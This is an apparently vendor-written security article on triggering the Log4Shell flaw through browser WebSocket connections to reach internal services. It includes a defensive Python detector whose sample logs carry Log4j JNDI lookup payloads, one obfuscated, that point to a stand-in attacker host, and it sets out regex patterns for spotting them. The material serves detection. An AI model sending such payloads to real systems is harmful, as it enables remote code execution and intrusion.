Infiltrating Internal Networks with Log4Shell


Now that the year is in its last days, we can retrospectively examine the most significant disruption that occurred in 2021. Slowly we begin to grasp the scope of events that followed the discovery of CVE-2021-44228, also known as ‘Log4Shell’, and its impact on the information security world.

While security teams worked around the clock to protect their servers from the vulnerability, they overlooked a more sophisticated Log4Shell attack vector, one that lets attackers reach into their victims’ internal environments.




Exploiting Log4Shell vulnerability via WebSockets

Since the discovery, many security researchers have dug deeper into this vulnerability to understand its full potential. In a report, Blumira’s CTO, Matthew Warner, presented a variant they found: triggering the vulnerability through a WebSocket connection to machines running Log4j libraries. This is critical because it enables attacks on local services. In simple words, attackers can use the vulnerability to attack devices that are not exposed to the internet!

“Until now, everybody looked for the Log4Shell vulnerability on external servers open to the world. Now, hackers can even attack internal machines that you didn’t think could be breached,” says Ysrael Gurt, Reflectiz CTO. “This vector significantly expands the attack surface and can impact services running over a VPN or ones that are connected to the local network.”




Why WebSocket increases the attack surface

The real game-changer in the latest discovery is that the Log4j exploit can be delivered over WebSocket communication. This opens an entirely new attack vector that uses the digital supply chain and Java tooling to reach previously unreachable machines through a compromised server. Since a WebSocket request is issued by the client, every service reachable from the user’s machine becomes a potential target of that request.

But how is the WebSocket triggered? Websites serve crafted JavaScript code to their users. Let’s assume a user visits an unsafe website or is lured there by a phishing campaign. The compromised site loads the scripts running there, including the malicious JavaScript that targets the Log4j vulnerability. The user’s browser then actively sends malicious requests from the compromised device to other servers reachable from localhost, creating a breach point into the organization.
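From the defender’s side, the practical consequence of this vector is that the Log4j lookup string arrives at an internal service inside the WebSocket handshake itself (headers such as Sec-WebSocket-Protocol or User-Agent), and the request originates from an employee’s browser rather than from the internet. The following is an added example, not Reflectiz or Blumira code: it scans constructed access-log lines from an internal service, flags handshakes whose headers carry a Log4j JNDI lookup (including the nested-lookup obfuscation seen in the wild), and notes whether the browser’s Origin was outside an assumed allow-list. The log format, header names, host names and allow-list are assumptions.

```python
"""Detect Log4Shell lookup strings carried in WebSocket handshakes.

Added example (not the article's or any vendor's code). The log line
format and the allowed-origin list are assumptions for illustration.
"""
import re
from urllib.parse import unquote

# Assumed log format, one handshake per line:
#   "<client-ip> <Origin header> <path> <Header>=<value> <Header>=<value> ..."
# Values are percent-encoded by the logger so they contain no spaces.
# All lines below are constructed sample data, not real traffic.
SAMPLE_LOG = [
    "127.0.0.1 https://intranet.example.internal /ws Upgrade=websocket Sec-WebSocket-Protocol=json",
    "127.0.0.1 https://malicious-site.example.test /ws Upgrade=websocket "
    "Sec-WebSocket-Protocol=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example.test%2Fa%7D",
    "127.0.0.1 https://malicious-site.example.test /ws Upgrade=websocket "
    "User-Agent=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example.test%2Fa%7D",
    "10.0.0.5 https://intranet.example.internal /ws Upgrade=websocket X-Tmpl=%24%7Buser%7D",
    "10.0.0.5 https://intranet.example.internal /api Accept=text/html",
]

# Assumed: origins that are legitimately allowed to open WebSockets to us.
ALLOWED_ORIGINS = {"https://intranet.example.internal"}

# The core pattern: a Log4j lookup that dispatches to JNDI.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Obfuscation wrappers that resolve to a single character and are used to
# split the literal "jndi": ${lower:j}, ${upper:J}, ${::-j}, ${env:NOPE:-j}.
CASE_WRAPPER = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([a-z])\s*\}", re.IGNORECASE)
DEFAULT_WRAPPER = re.compile(r"\$\{[^${}]*:-([^${}])\}")


def collapse_lookups(value: str) -> str:
    """Repeatedly replace single-character lookup wrappers with the character
    they resolve to, so nested obfuscation collapses to the plain string."""
    previous = None
    while previous != value:
        previous = value
        value = CASE_WRAPPER.sub(r"\1", value)
        value = DEFAULT_WRAPPER.sub(r"\1", value)
    return value


def contains_jndi_lookup(value: str) -> bool:
    """True if the (possibly obfuscated) value contains a ${jndi:...} lookup."""
    return bool(JNDI_LOOKUP.search(collapse_lookups(value)))


def parse_line(line: str) -> dict:
    """Parse one assumed-format log line into client, origin, path and headers."""
    client, origin, path, *raw_headers = line.split()
    headers = {}
    for item in raw_headers:
        name, _, encoded = item.partition("=")
        headers[name.lower()] = unquote(encoded)
    return {"client": client, "origin": origin, "path": path, "headers": headers}


def scan(lines) -> list:
    """Return one finding per log line whose headers carry a JNDI lookup."""
    findings = []
    for entry in map(parse_line, lines):
        headers = entry["headers"]
        hit_headers = [name for name, value in headers.items() if contains_jndi_lookup(value)]
        if not hit_headers:
            continue
        findings.append({
            "client": entry["client"],
            "origin": entry["origin"],
            "path": entry["path"],
            "websocket": headers.get("upgrade", "").lower() == "websocket",
            "cross_origin": entry["origin"] not in ALLOWED_ORIGINS,
            "headers": hit_headers,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two design points are worth noting. The detector collapses the single-character lookup wrappers before matching, because a plain `${jndi:` signature misses the `${${lower:j}ndi:` style that attackers used to evade early rules; the benign `${user}` template in the fourth line is not flagged, since only JNDI dispatch matters here. And the `cross_origin` flag is the signal specific to this vector: a JNDI string in a handshake whose Origin is an arbitrary public site, sent from a client on the local network, is exactly the browser-relayed attack the article describes. Detection is a stopgap; the fix remains upgrading Log4j to a patched release (or removing the JndiLookup class), which stops the lookup from being evaluated regardless of how the string arrives.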

This is why JavaScript libraries are such a valuable target for threat actors. Attacking a single website might affect all of the website’s users, but attacking a popular library might affect a hundred million users worldwide. 




The power of client-side and JavaScript attacks

“This again proves the untapped potential of client-side code,” Ysrael explains. “JavaScript is external code that runs on the user’s computer,” he adds. “It means that you can raise as many security measurements as possible, but at the end of the day, hackers are looking to attack the weakest link in your supply chain.” 

This case gives us yet more proof of the possibilities JavaScript frameworks offer as a tool for cyber-attacks. It shows, once again, that all it takes to compromise even the most secure entity is finding the right blind spot.




We already knew how dangerous the extensive use of Log4j libraries across various devices is. However, this discovery proves that threat actors can escalate the Log4Shell vulnerability into large-scale supply chain attacks.

The Log4Shell saga is an ongoing event, one whose full impact we have yet to see. It reminds us that there is always a new vulnerability to exploit.
